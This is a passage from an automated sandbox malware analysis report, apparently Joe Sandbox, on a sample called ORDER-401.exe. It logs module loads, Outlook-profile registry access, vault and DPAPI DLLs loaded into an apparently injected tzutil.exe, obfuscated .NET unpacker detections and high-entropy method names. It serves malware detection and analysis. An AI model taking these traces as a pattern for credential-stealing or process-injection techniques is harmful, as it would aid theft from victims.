                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: ORDER-401.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ORDER-401.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000002.3256736899.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PcwrDoOfOMD.exe, 00000007.00000000.2018936585.0000000000D6E000.00000002.00000001.01000000.0000000C.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167501370.0000000000D6E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORDER-401.exe, 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2096803511.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2099649297.0000000002FB4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORDER-401.exe, ORDER-401.exe, 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2096803511.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2099649297.0000000002FB4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000002.3256736899.00000000013F8000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.cs.Net Code: tjtwG0sMBJ System.Reflection.Assembly.Load(byte[])
                Source: 0.2.ORDER-401.exe.5f70000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.cs.Net Code: tjtwG0sMBJ System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 0_2_02A7E520 push eax; retf 0_2_02A7E521
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 0_2_07CB6450 push cs; retf 0_2_07CB6451
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 0_2_07CB646F pushad ; retf 0_2_07CB6472
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 0_2_07CB6467 push cs; retf 0_2_07CB646D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 0_2_07CB647F pushad ; retf 0_2_07CB6482
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 0_2_07CB564A push edi; retf 0_2_07CB5762
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004031D0 push eax; ret 4_2_004031D2
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_004169E7 push 0F6CFD2Bh; ret 4_2_00416A18
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00423A0A push esp; ret 4_2_00423A0D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00419359 push ds; ret 4_2_0041935B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00418366 pushad ; iretd 4_2_00418367
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00408325 push dword ptr [ebx+5Dh]; ret 4_2_0040830B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00417388 push edi; ret 4_2_0041738D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00419477 push edx; ret 4_2_00419485
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00408403 push 00000074h; iretd 4_2_0040840B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00417411 push eax; ret 4_2_00417414
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00411D6F push ds; iretd 4_2_00411DBD
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00411D7B push ds; iretd 4_2_00411DBD
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0041758A push ebp; ret 4_2_004175A6
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0040D66A push ecx; iretd 4_2_0040D6D9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00414E05 push cs; retf 4_2_00414E14
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0040860D push cs; retf 4_2_0040860E
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00413E93 pushfd ; ret 4_2_00413F00
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_00413EBC pushfd ; ret 4_2_00413F00
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0151225F pushad ; ret 4_2_015127F9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015127FA pushad ; ret 4_2_015127F9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015409AD push ecx; mov dword ptr [esp], ecx4_2_015409B6
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0151283D push eax; iretd 4_2_01512858
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F27CA3 push eax; ret 7_2_04F27CA6
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F18C95 push 00000074h; iretd 7_2_04F18C9D
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F27C1A push edi; ret 7_2_04F27C1F
                Source: ORDER-401.exeStatic PE information: section name: .text entropy: 7.789767866575687
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, s8O6f0hQrrm7LD37lO.csHigh entropy of concatenated method names: 'c7Hb9CF4x5', 'yGwbSTNOdM', 'ToString', 'NLNb2BPsW9', 'WA9bUch4TR', 'HvDb8eOuoW', 'caObFCFSNB', 'lpdb0Fj9qK', 'YQTbg2RJNH', 'blPb5cJ6VC'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, OghYC8AsMXf86gZ4Lr.csHigh entropy of concatenated method names: 'AHeLYgUHXr', 'WvrLKkOxEU', 'paqLlmAsNZ', 'JqfLWqARXi', 'TQ4LPv0IJe', 'VwOLVmDKiG', 'AbiLDdy0ns', 'pPSLXbjgvE', 'kEHL49rEYE', 'VIdLeKahSm'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, aQtnXxRRhYtMLdqBg5n.csHigh entropy of concatenated method names: 'k3eIcHWvwm', 'n5DIzVcQ2P', 'fNwJTDo1D2', 'wsaJRU8TsY', 'qQxJHulMru', 'pT3JaSWiZj', 'cL5Jww4ZR6', 'YaTJxWDc8c', 'dflJ2EFTNn', 'NiFJURH7n6'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, tO9lakD4N1gSofW9N9.csHigh entropy of concatenated method names: 'w8Sg2l7cMi', 'Q7wg8loK6T', 'OHYg06p9ZU', 'NFF0c1FgSn', 'OiO0zWR5nI', 'cOwgTVejnr', 'mMIgRhZ4Yp', 'abwgHA8SAc', 'PwFgaIUIXF', 'XkMgwd8CEO'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, l96jCkWo0Qgw1Rruei.csHigh entropy of concatenated method names: 'WgB0vJP6Dp', 'syP0uMabZ8', 'vtu0GSiosL', 'J9B0BKc0ER', 'IHk0Qayysw', 'FH10kTQ63K', 'PBu0E3iG8l', 'JIn06xXedO', 'TgKh2cmc8fXVVOKrC89', 'NkdDeKmS8SG77R5sHfJ'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, Dyt4SaHyhgDsWX8b9b.csHigh entropy of concatenated method names: 'rl8GWtGrd', 'sroBggEpj', 'DjyQRJhfu', 'AvZkiomUQ', 'xbPEWbkTS', 'm4W6EXRHW', 'AXhiqe9rmG3vPt5X1I', 'jiZNo2XpVg8eaZDePP', 'L3hx3nPGvBET6qjb8r', 'w9HoBiDWi'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, swWcZnRwsr2OtsIY1v1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fAINL1M2YM', 'PkQNIO7V1R', 'ioWNJ5Lpxb', 'OL1NNeDyNq', 'jB0N18IVcY', 'T4iNtq8tLc', 'RbmNvffMXc'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, CEVQbPUU2lsUMWDVTT.csHigh entropy of concatenated method names: 'Dispose', 'U1ZRAT5TjL', 'sQJHKSh9ji', 'UPySPpN2K6', 'PIWRcQLTAg', 'R8KRzetni6', 'ProcessDialogKey', 'okrHTghYC8', 'WMXHRf86gZ', 'MLrHHOFYCP'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, SamS6iCuFEqkdcLqE4.csHigh entropy of concatenated method names: 'hQNfsDp1OJ', 'YoIfiGgL1h', 'evVfADZORA', 'WdwfcRrPyg', 'iMs1BdOzvcaniaZ96jB', 'ReJBq0w5kKCBv0Ef7UE', 'xqbJ2OwbQG1WYJRX8TM'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, lFYCPHcw4vulGgMZ7v.csHigh entropy of concatenated method names: 'UAZI8pfSiL', 'nJbIFgdn1e', 'nocI0k2KQP', 'bc5IgZIJnZ', 'iNiILtc3E0', 'qjWI5RfhPp', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, oGlpQvwpPvihUdfBbf.csHigh entropy of concatenated method names: 'wNbRg7rgpH', 'ldHR5f1607', 'cSfR9bY7jX', 'idkRSUCbYT', 'wgQRfxggFw', 'W4sRmcYlqD', 'aHYIsMIPuefhw5In8N', 'KEVMs7EXayUU0Bc6aF', 'mDORRWijnM', 'OqMRavFpu7'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, H7I67HESfbY7jX0dkU.csHigh entropy of concatenated method names: 'pXC8BVWtZR', 'h0M8QN5ICe', 'Bf48pDCy9Z', 'Ycv8Ee9png', 'sYR8fEX5JN', 'oqi8mpQfvj', 'MuC8beo2vM', 'xX68oLlDhY', 'ELD8LNpBYa', 'aJg8IvjAvO'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, L2NoNEZg4MRFvy56ar.csHigh entropy of concatenated method names: 'OjLbiNp3fd', 'WQhbcceP8p', 'bipoTcOCXy', 'o85oRNSCBd', 'fhbbrgPvOc', 'ytObd7pSNL', 'xtHb3H1gHZ', 'jipbqdIfgv', 'EGDbCISsmL', 'k4QbjNWoGi'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, q7rgpHp9dHf1607YWr.csHigh entropy of concatenated method names: 'JA0UqDwluw', 'EyeUCNFv9R', 'nQ3Uj8dTtZ', 'LebUhaXqXx', 'Qi0UneXr55', 'wsfUZs3bNV', 'xb5UsWMoee', 'c7BUiHxxbt', 'm4MUAeLafS', 'IOuUcXG6eX'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, jFwi4sYcYlqDWYH0Ge.csHigh entropy of concatenated method names: 'S280xkPPIS', 'kpi0U0sibk', 'Hyr0F7noMh', 'iDF0gBZ1Wh', 'jia05DKIs6', 'vChFnGfcAY', 'IDyFZvTYEN', 'UdyFsO71kc', 'ntjFiAEXZo', 'IO0FAYWHYE'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, o0E95jsIfn1ZT5TjLd.csHigh entropy of concatenated method names: 'ARnLfGSdIt', 'vTILb07CgD', 'ueRLLfXRww', 'bfLLJuKY36', 'rThL184qOd', 'JrVLv8vX2H', 'Dispose', 'siSo2Vnh0o', 'V1loUtZ3Ia', 'ThFo8KyoOK'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, HGHaKKzeS9M9EsO0B1.csHigh entropy of concatenated method names: 'hNDIQuUA4U', 'UKJIpyxSjN', 'CWSIEb17fd', 'tLhIYFmcKL', 'Mw1IKsL8YH', 'w9EIWVYnMI', 'BROIPqcNo9', 'dD8IvVx5MA', 'qiaIu8h9Fc', 'TC9IMrU5Sk'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, dZTsUg38g9r2ovArmP.csHigh entropy of concatenated method names: 'qIuypnulYW', 'pZgyEkfjDa', 'pPxyYIh8Xa', 'KimyK3lxqK', 'l92yWbIID8', 'gUHyPgKUMR', 'oFiyDualhs', 'ppWyXWPcT5', 'Fh3yesrhYm', 'k3MyrZ4mQc'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, yDeeW44Gfq5GeOq8R0.csHigh entropy of concatenated method names: 'pp4gu01Wg9', 'aCKgMVJW61', 'D6ygGs6VCA', 'J3qgBuufng', 'VQkg7B5ZN1', 'OwpgQ4XHaY', 'vZUgkW4OIa', 'KMJgpLsPLQ', 'a4sgEU9AuR', 'LV3g6wRmhX'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.csHigh entropy of concatenated method names: 'jNWaxJwBUU', 'yCya2IdfXC', 'BN9aURddDr', 'Fyda8NHF8W', 'OGaaFMUvKs', 'Vd2a0IIDZs', 'FshagTlDyE', 'EEha53yMLF', 'HWGaOrQuNg', 'oUHa9kdBB8'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, XC2CCvRTw7FGef0XLM5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MeoIrdXiOx', 'ulZIds6BfB', 'wCZI3tPlJg', 'whXIq8Al4B', 'an1ICTZNsH', 'HXYIjaAnjg', 'YK9IhdGks8'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, s8O6f0hQrrm7LD37lO.csHigh entropy of concatenated method names: 'c7Hb9CF4x5', 'yGwbSTNOdM', 'ToString', 'NLNb2BPsW9', 'WA9bUch4TR', 'HvDb8eOuoW', 'caObFCFSNB', 'lpdb0Fj9qK', 'YQTbg2RJNH', 'blPb5cJ6VC'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, OghYC8AsMXf86gZ4Lr.csHigh entropy of concatenated method names: 'AHeLYgUHXr', 'WvrLKkOxEU', 'paqLlmAsNZ', 'JqfLWqARXi', 'TQ4LPv0IJe', 'VwOLVmDKiG', 'AbiLDdy0ns', 'pPSLXbjgvE', 'kEHL49rEYE', 'VIdLeKahSm'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, aQtnXxRRhYtMLdqBg5n.csHigh entropy of concatenated method names: 'k3eIcHWvwm', 'n5DIzVcQ2P', 'fNwJTDo1D2', 'wsaJRU8TsY', 'qQxJHulMru', 'pT3JaSWiZj', 'cL5Jww4ZR6', 'YaTJxWDc8c', 'dflJ2EFTNn', 'NiFJURH7n6'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, tO9lakD4N1gSofW9N9.csHigh entropy of concatenated method names: 'w8Sg2l7cMi', 'Q7wg8loK6T', 'OHYg06p9ZU', 'NFF0c1FgSn', 'OiO0zWR5nI', 'cOwgTVejnr', 'mMIgRhZ4Yp', 'abwgHA8SAc', 'PwFgaIUIXF', 'XkMgwd8CEO'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, l96jCkWo0Qgw1Rruei.csHigh entropy of concatenated method names: 'WgB0vJP6Dp', 'syP0uMabZ8', 'vtu0GSiosL', 'J9B0BKc0ER', 'IHk0Qayysw', 'FH10kTQ63K', 'PBu0E3iG8l', 'JIn06xXedO', 'TgKh2cmc8fXVVOKrC89', 'NkdDeKmS8SG77R5sHfJ'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, Dyt4SaHyhgDsWX8b9b.csHigh entropy of concatenated method names: 'rl8GWtGrd', 'sroBggEpj', 'DjyQRJhfu', 'AvZkiomUQ', 'xbPEWbkTS', 'm4W6EXRHW', 'AXhiqe9rmG3vPt5X1I', 'jiZNo2XpVg8eaZDePP', 'L3hx3nPGvBET6qjb8r', 'w9HoBiDWi'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, swWcZnRwsr2OtsIY1v1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fAINL1M2YM', 'PkQNIO7V1R', 'ioWNJ5Lpxb', 'OL1NNeDyNq', 'jB0N18IVcY', 'T4iNtq8tLc', 'RbmNvffMXc'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, CEVQbPUU2lsUMWDVTT.csHigh entropy of concatenated method names: 'Dispose', 'U1ZRAT5TjL', 'sQJHKSh9ji', 'UPySPpN2K6', 'PIWRcQLTAg', 'R8KRzetni6', 'ProcessDialogKey', 'okrHTghYC8', 'WMXHRf86gZ', 'MLrHHOFYCP'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, SamS6iCuFEqkdcLqE4.csHigh entropy of concatenated method names: 'hQNfsDp1OJ', 'YoIfiGgL1h', 'evVfADZORA', 'WdwfcRrPyg', 'iMs1BdOzvcaniaZ96jB', 'ReJBq0w5kKCBv0Ef7UE', 'xqbJ2OwbQG1WYJRX8TM'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, lFYCPHcw4vulGgMZ7v.csHigh entropy of concatenated method names: 'UAZI8pfSiL', 'nJbIFgdn1e', 'nocI0k2KQP', 'bc5IgZIJnZ', 'iNiILtc3E0', 'qjWI5RfhPp', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, oGlpQvwpPvihUdfBbf.csHigh entropy of concatenated method names: 'wNbRg7rgpH', 'ldHR5f1607', 'cSfR9bY7jX', 'idkRSUCbYT', 'wgQRfxggFw', 'W4sRmcYlqD', 'aHYIsMIPuefhw5In8N', 'KEVMs7EXayUU0Bc6aF', 'mDORRWijnM', 'OqMRavFpu7'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, H7I67HESfbY7jX0dkU.csHigh entropy of concatenated method names: 'pXC8BVWtZR', 'h0M8QN5ICe', 'Bf48pDCy9Z', 'Ycv8Ee9png', 'sYR8fEX5JN', 'oqi8mpQfvj', 'MuC8beo2vM', 'xX68oLlDhY', 'ELD8LNpBYa', 'aJg8IvjAvO'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, L2NoNEZg4MRFvy56ar.csHigh entropy of concatenated method names: 'OjLbiNp3fd', 'WQhbcceP8p', 'bipoTcOCXy', 'o85oRNSCBd', 'fhbbrgPvOc', 'ytObd7pSNL', 'xtHb3H1gHZ', 'jipbqdIfgv', 'EGDbCISsmL', 'k4QbjNWoGi'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, q7rgpHp9dHf1607YWr.csHigh entropy of concatenated method names: 'JA0UqDwluw', 'EyeUCNFv9R', 'nQ3Uj8dTtZ', 'LebUhaXqXx', 'Qi0UneXr55', 'wsfUZs3bNV', 'xb5UsWMoee', 'c7BUiHxxbt', 'm4MUAeLafS', 'IOuUcXG6eX'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, jFwi4sYcYlqDWYH0Ge.csHigh entropy of concatenated method names: 'S280xkPPIS', 'kpi0U0sibk', 'Hyr0F7noMh', 'iDF0gBZ1Wh', 'jia05DKIs6', 'vChFnGfcAY', 'IDyFZvTYEN', 'UdyFsO71kc', 'ntjFiAEXZo', 'IO0FAYWHYE'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, o0E95jsIfn1ZT5TjLd.csHigh entropy of concatenated method names: 'ARnLfGSdIt', 'vTILb07CgD', 'ueRLLfXRww', 'bfLLJuKY36', 'rThL184qOd', 'JrVLv8vX2H', 'Dispose', 'siSo2Vnh0o', 'V1loUtZ3Ia', 'ThFo8KyoOK'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, HGHaKKzeS9M9EsO0B1.csHigh entropy of concatenated method names: 'hNDIQuUA4U', 'UKJIpyxSjN', 'CWSIEb17fd', 'tLhIYFmcKL', 'Mw1IKsL8YH', 'w9EIWVYnMI', 'BROIPqcNo9', 'dD8IvVx5MA', 'qiaIu8h9Fc', 'TC9IMrU5Sk'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, dZTsUg38g9r2ovArmP.csHigh entropy of concatenated method names: 'qIuypnulYW', 'pZgyEkfjDa', 'pPxyYIh8Xa', 'KimyK3lxqK', 'l92yWbIID8', 'gUHyPgKUMR', 'oFiyDualhs', 'ppWyXWPcT5', 'Fh3yesrhYm', 'k3MyrZ4mQc'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, yDeeW44Gfq5GeOq8R0.csHigh entropy of concatenated method names: 'pp4gu01Wg9', 'aCKgMVJW61', 'D6ygGs6VCA', 'J3qgBuufng', 'VQkg7B5ZN1', 'OwpgQ4XHaY', 'vZUgkW4OIa', 'KMJgpLsPLQ', 'a4sgEU9AuR', 'LV3g6wRmhX'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.csHigh entropy of concatenated method names: 'jNWaxJwBUU', 'yCya2IdfXC', 'BN9aURddDr', 'Fyda8NHF8W', 'OGaaFMUvKs', 'Vd2a0IIDZs', 'FshagTlDyE', 'EEha53yMLF', 'HWGaOrQuNg', 'oUHa9kdBB8'
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, XC2CCvRTw7FGef0XLM5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MeoIrdXiOx', 'ulZIds6BfB', 'wCZI3tPlJg', 'whXIq8Al4B', 'an1ICTZNsH', 'HXYIjaAnjg', 'YK9IhdGks8'
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
